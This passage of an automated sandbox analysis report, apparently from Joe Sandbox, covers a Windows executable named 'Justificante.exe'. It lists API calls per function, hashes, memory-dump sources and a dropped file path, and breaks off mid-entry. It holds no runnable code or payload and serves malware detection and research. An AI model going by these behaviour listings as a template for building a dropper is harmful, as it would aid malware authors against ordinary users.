                          • Opcode ID: 9518b2dd1af65febbd9d180445f0764cbeb29eb017de111e17892d6d002d9159
                          • Instruction ID: 897ba5cc79bc3f0d18eddf3670deff7b1eb1d467b83339ddcdcbfe179e357187
                          • Opcode Fuzzy Hash: 9518b2dd1af65febbd9d180445f0764cbeb29eb017de111e17892d6d002d9159
                          • Instruction Fuzzy Hash: D3317CB2604205EBCB20DF39FE848263BA9B744395755023BE900B32F1C7B99D45DB9D
                          APIs
                          • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 004020FB
                            • Part of subcall function 004055A4: lstrlenW.KERNEL32(lgmnd,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00403040,00000000,?), ref: 004055DC
                            • Part of subcall function 004055A4: lstrlenW.KERNEL32(00403040,lgmnd,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00403040,00000000), ref: 004055EC
                            • Part of subcall function 004055A4: lstrcatW.KERNEL32(lgmnd,00403040,00403040,lgmnd,00000000,00000000,00000000), ref: 004055FF
                            • Part of subcall function 004055A4: SetWindowTextW.USER32(lgmnd,lgmnd), ref: 00405611
                            • Part of subcall function 004055A4: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405637
                            • Part of subcall function 004055A4: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405651
                            • Part of subcall function 004055A4: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565F
                          • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040210C
                          • FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 00402189
                          Memory Dump Source
                          • Source File: 00000000.00000002.1504554212.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1504539183.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504569385.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504762697.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Justificante.jbxd
                          Similarity
                          • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                          • String ID:
                          • API String ID: 334405425-0
                          • Opcode ID: 33b9162f9871de27561a459b6c53bf9a81ffa5e0e58a4fd5a48cf198440a85f1
                          • Instruction ID: f92bc13af20f738db02ac2fc0b39f0a9d6660206439d55b7b5299bd0a9e162c8
                          • Opcode Fuzzy Hash: 33b9162f9871de27561a459b6c53bf9a81ffa5e0e58a4fd5a48cf198440a85f1
                          • Instruction Fuzzy Hash: 4521C671600204EBCF10AFA5CE48A9E7B70AF44358F70413BF511B91E1C7BD8E82966E
                          APIs
                            • Part of subcall function 0040689A: FindFirstFileW.KERNELBASE(76F93420,00426798,00425F50,00405F62,00425F50,00425F50,00000000,00425F50,00425F50,76F93420,?,76F92EE0,00405C6E,?,76F93420,76F92EE0), ref: 004068A5
                            • Part of subcall function 0040689A: FindClose.KERNEL32(00000000), ref: 004068B1
                          • lstrlenW.KERNEL32 ref: 00402337
                          • lstrlenW.KERNEL32(00000000), ref: 00402342
                          • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 0040236B
                          Memory Dump Source
                          • Source File: 00000000.00000002.1504554212.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1504539183.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504569385.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504762697.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Justificante.jbxd
                          Similarity
                          • API ID: FileFindlstrlen$CloseFirstOperation
                          • String ID:
                          • API String ID: 1486964399-0
                          • Opcode ID: c2edfcb57da0e0aac0677195e42599c3a612085699abb10782a808aa8e454292
                          • Instruction ID: 4d293297d37f642e50e334be784923d4dbf5a3b79a36c56dc06a2ee29788e7cf
                          • Opcode Fuzzy Hash: c2edfcb57da0e0aac0677195e42599c3a612085699abb10782a808aa8e454292
                          • Instruction Fuzzy Hash: 31113071910318A6CB10EFB9CE4999EB7B9FF14314F10443FA915FB2D1D6BC89418B69
                          APIs
                          • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004025C9
                          • RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 004025DC
                          • RegCloseKey.ADVAPI32(?,?,?,C:\ProgramData\bestializing\slagtehuset.spo,00000000,00000011,00000002), ref: 004025F5
                          Memory Dump Source
                          • Source File: 00000000.00000002.1504554212.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1504539183.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504569385.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504762697.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Justificante.jbxd
                          Similarity
                          • API ID: Enum$CloseValue
                          • String ID:
                          • API String ID: 397863658-0
                          • Opcode ID: 2aa466f157e62aed68df7da1bceb92882379c7dbe11c50e5834602b1e343cc80
                          • Instruction ID: 6eea7ab82af3d2392c4b6f989cbcf8a15a9c336fd28670f1f8a7e461480f06f5
                          • Opcode Fuzzy Hash: 2aa466f157e62aed68df7da1bceb92882379c7dbe11c50e5834602b1e343cc80
                          • Instruction Fuzzy Hash: 88017C71A11604BBEB149FA49E48AAEB77CEF40348F10403AF901B61C0D7B85E40866D
                          APIs
                          • SetFilePointer.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,?,?,004032B5,000000FF,00000000,00000000,0040A230,?), ref: 0040332E
                          Memory Dump Source
                          • Source File: 00000000.00000002.1504554212.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1504539183.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504569385.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504762697.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Justificante.jbxd
                          Similarity
                          • API ID: FilePointer
                          • String ID:
                          • API String ID: 973152223-0
                          • Opcode ID: a028361fc9e97e52d64351f184ba52d3dd7daec5df95744dc32eca756b6c47e1
                          • Instruction ID: fc1c1b99c1c3d1c2481461a51282f6204a9bfe71311cf5a9819f6edaa66b9ece
                          • Opcode Fuzzy Hash: a028361fc9e97e52d64351f184ba52d3dd7daec5df95744dc32eca756b6c47e1
                          • Instruction Fuzzy Hash: C6319F70200219EFDB11CF55ED84A9E3FA8FB00355B20443AF905EA1D1D778DE51DBA9
                          APIs
                          • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,00000033), ref: 00402553
                          • RegCloseKey.ADVAPI32(?,?,?,C:\ProgramData\bestializing\slagtehuset.spo,00000000,00000011,00000002), ref: 004025F5
                          Memory Dump Source
                          • Source File: 00000000.00000002.1504554212.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1504539183.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504569385.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504762697.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Justificante.jbxd
                          Similarity
                          • API ID: CloseQueryValue
                          • String ID:
                          • API String ID: 3356406503-0
                          • Opcode ID: c5426f6b1407dfee5a241eb0e2e632f2a45666aecdf3cf900eeb7cf70ae563aa
                          • Instruction ID: f0d649c8be7bcd6d72a7f6236f3e083c4832147513a68f4e0a15fa01edc77ece
                          • Opcode Fuzzy Hash: c5426f6b1407dfee5a241eb0e2e632f2a45666aecdf3cf900eeb7cf70ae563aa
                          • Instruction Fuzzy Hash: A4113A71A10209EBDF14DFA4DA589AEB774FF04354B20843BE806B62D0D7B88A45DB5E
                          APIs
                          • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                          • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                          Memory Dump Source
                          • Source File: 00000000.00000002.1504554212.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1504539183.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504569385.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504762697.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Justificante.jbxd
                          Similarity
                          • API ID: MessageSend
                          • String ID:
                          • API String ID: 3850602802-0
                          • Opcode ID: d662c2adc7386def8032e0caa440f6f516c0d103e2adf936855243d12f81b3d3
                          • Instruction ID: 2e9f13adc1e302feb6e44b0cfdad9a37d499f26753b45a494d358932ab564816
                          • Opcode Fuzzy Hash: d662c2adc7386def8032e0caa440f6f516c0d103e2adf936855243d12f81b3d3
                          • Instruction Fuzzy Hash: 2501F431724220EBEB295B389D05B6A3698E710314F10857FF855F66F1E678CC029B6D
                          APIs
                          • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040244E
                          • RegCloseKey.ADVAPI32(00000000), ref: 00402457
                          Memory Dump Source
                          • Source File: 00000000.00000002.1504554212.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1504539183.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504569385.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504762697.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Justificante.jbxd
                          Similarity
                          • API ID: CloseDeleteValue
                          • String ID:
                          • API String ID: 2831762973-0
                          • Opcode ID: 33b3fc7685c92c60e94f70401c71e197941d70c69b0495cf95586cf4f9f05fba
                          • Instruction ID: 0eea939cfefa250e45086769c78755c0b3bfdf1c9c70056638625836d9ad0d91
                          • Opcode Fuzzy Hash: 33b3fc7685c92c60e94f70401c71e197941d70c69b0495cf95586cf4f9f05fba
                          • Instruction Fuzzy Hash: FFF06232A00120ABDB10AFA89A4DAAE73A5AF44314F12443FE651B71C1DAFC5D01563E
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1504554212.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1504539183.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504569385.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504762697.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Justificante.jbxd
                          Similarity
                          • API ID: ShowWindow
                          • String ID:
                          • API String ID: 1268545403-0
                          • Opcode ID: b9b3991d1ebe911dd375e094db26284e04d3827c435e86b9088208923ace82c2
                          • Instruction ID: 68d2f30391901d1d9ba62db1430854f87f0e26d751f15bb82e1089b222079e22
                          • Opcode Fuzzy Hash: b9b3991d1ebe911dd375e094db26284e04d3827c435e86b9088208923ace82c2
                          • Instruction Fuzzy Hash: 2AE0BF76B20114ABCB14DFA8ED9086E77B5EB54310760487AE902B3290C675AC11CB78
                          APIs
                          • GetModuleHandleA.KERNEL32(?,00000020,?,0040364A,0000000B), ref: 00406943
                          • GetProcAddress.KERNEL32(00000000,?), ref: 0040695E
                            • Part of subcall function 004068C1: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068D8
                            • Part of subcall function 004068C1: wsprintfW.USER32 ref: 00406913
                            • Part of subcall function 004068C1: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406927
                          Memory Dump Source
                          • Source File: 00000000.00000002.1504554212.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1504539183.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504569385.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504762697.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Justificante.jbxd
                          Similarity
                          • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                          • String ID:
                          • API String ID: 2547128583-0
                          • Opcode ID: a89557e88259ac32882439a66efe2bded2b7fe37332f597cb2162f61758b0433
                          • Instruction ID: ca9fc7dfa89fe5ea16e4639455fc103decb8165a688e618dc96f0396de22bceb
                          • Opcode Fuzzy Hash: a89557e88259ac32882439a66efe2bded2b7fe37332f597cb2162f61758b0433
                          • Instruction Fuzzy Hash: A5E0867390422057E61056705E4CC3773A8ABC4750306443EF556F2140DB38DC35977A
                          APIs
                          • GetFileAttributesW.KERNELBASE(00000003,004030AB,C:\Users\user\Desktop\Justificante.exe,80000000,00000003), ref: 00406036
                          • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406058
                          Memory Dump Source
                          • Source File: 00000000.00000002.1504554212.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1504539183.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504569385.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504762697.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Justificante.jbxd
                          Similarity
                          • API ID: File$AttributesCreate
                          • String ID:
                          • API String ID: 415043291-0
                          • Opcode ID: bc48b18717e6d0ecb647aea7fc0ab07bebcbb2e2e3a0bd9572a83b91cd6509df
                          • Instruction ID: 0e1b57c135d9ed337dcee0f1630d7a3ffd6699826ab823f4ff8c6da5104765b0
                          • Opcode Fuzzy Hash: bc48b18717e6d0ecb647aea7fc0ab07bebcbb2e2e3a0bd9572a83b91cd6509df
                          • Instruction Fuzzy Hash: DCD09E71254201AFEF0D8F20DF16F2E7AA2EB94B04F11952CB682940E1DAB15C15AB19
                          APIs
                          • GetFileAttributesW.KERNELBASE(?,?,00405C12,?,?,00000000,00405DE8,?,?,?,?), ref: 00406012
                          • SetFileAttributesW.KERNEL32(?,00000000), ref: 00406026
                          Memory Dump Source
                          • Source File: 00000000.00000002.1504554212.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1504539183.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504569385.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504762697.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Justificante.jbxd
                          Similarity
                          • API ID: AttributesFile
                          • String ID:
                          • API String ID: 3188754299-0
                          • Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                          • Instruction ID: 2aab62ad23f8cb6709c95f945eae6201b0fb2c2ffcd307ea01f0c72ec21377a4
                          • Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                          • Instruction Fuzzy Hash: 9AD0C972504131ABC2502728EE0889ABF55EF682717014A35F9A5A22B0CB314C628A98
                          APIs
                          • CreateDirectoryW.KERNELBASE(?,00000000,004035CB,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403822,?,00000007,00000009,0000000B), ref: 00405AF6
                          • GetLastError.KERNEL32(?,00000007,00000009,0000000B), ref: 00405B04
                          Memory Dump Source
                          • Source File: 00000000.00000002.1504554212.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1504539183.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504569385.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504762697.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Justificante.jbxd
                          Similarity
                          • API ID: CreateDirectoryErrorLast
                          • String ID:
                          • API String ID: 1375471231-0
                          • Opcode ID: 3d774f31bfc7c5d70b6f8c035fc875d1b29c99f0800ffc9da4ab7b914865a185
                          • Instruction ID: 7b2d9cd717f5aff8da3a1f7dd460dbe6a594badd890d3698b32dee5738bc8dc1
                          • Opcode Fuzzy Hash: 3d774f31bfc7c5d70b6f8c035fc875d1b29c99f0800ffc9da4ab7b914865a185
                          • Instruction Fuzzy Hash: 50C04C30204601AEDA509B30DF08B177AA4AF50741F1158396246E40A0DA78A455D92D
                          APIs
                          • MoveFileW.KERNEL32(00000000,00000000), ref: 00401696
                          Memory Dump Source
                          • Source File: 00000000.00000002.1504554212.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1504539183.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504569385.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504762697.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Justificante.jbxd
                          Similarity
                          • API ID: FileMove
                          • String ID:
                          • API String ID: 3562171763-0
                          • Opcode ID: ab93fb311b540cfba5f716726d6ded9f0accba70f4a9561cc02b9cfac86f6025
                          • Instruction ID: 7206a17c4d5fce065d1639f2aed3a35bc4cb39007168cc9cbc0cfc9d8a61edfe
                          • Opcode Fuzzy Hash: ab93fb311b540cfba5f716726d6ded9f0accba70f4a9561cc02b9cfac86f6025
                          • Instruction Fuzzy Hash: F4F0543160411497CB10AFB68F0DD5F33649F52328F254A3FB421B21D1D6FD8942556F
                          APIs
                          • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 004023E1
                          Memory Dump Source
                          • Source File: 00000000.00000002.1504554212.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1504539183.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504569385.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504762697.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Justificante.jbxd
                          Similarity
                          • API ID: PrivateProfileStringWrite
                          • String ID:
                          • API String ID: 390214022-0
                          • Opcode ID: 84911039e741b8054182bf8c56606a22799472c4c6cd86ceafd7de9864a58810
                          • Instruction ID: 2036f094aef4cf8fcdd3ce51ebd23e93268b82f075a1b79732874c3119e34eec
                          • Opcode Fuzzy Hash: 84911039e741b8054182bf8c56606a22799472c4c6cd86ceafd7de9864a58810
                          • Instruction Fuzzy Hash: 30E086319001246ADB303AF15E8DEBF21586F44345B14093FFA12B62C2DAFC0C42467D
                          APIs
                          • SearchPathW.KERNELBASE(?,00000000,?,00000400,?,?,000000FF), ref: 00401749
                          Memory Dump Source
                          • Source File: 00000000.00000002.1504554212.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1504539183.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504569385.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504762697.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Justificante.jbxd
                          Similarity
                          • API ID: PathSearch
                          • String ID:
                          • API String ID: 2203818243-0
                          • Opcode ID: 306ba877737f5f79caabae69db5a0b9a44cd0244ae65e30377372c17e1f0e8e0
                          • Instruction ID: 8655e5fe009c5ad16bea028e6ef65502ba04d8f6e2b512f500e54641b6ee4b59
                          • Opcode Fuzzy Hash: 306ba877737f5f79caabae69db5a0b9a44cd0244ae65e30377372c17e1f0e8e0
                          • Instruction Fuzzy Hash: 94E04872714244ABD700DFA4DD49EAB7368EF50358B304536A611A50C1D6B459419729
                          APIs
                          • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402DEF,00000000,?,?), ref: 00406400
